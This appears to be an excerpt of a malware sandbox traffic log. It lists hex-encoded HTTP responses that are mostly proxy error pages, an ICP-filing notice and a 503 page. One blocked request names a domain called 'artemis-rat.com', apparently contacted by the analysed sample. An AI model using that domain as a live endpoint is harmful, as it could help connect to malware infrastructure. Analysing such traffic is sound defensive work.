22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 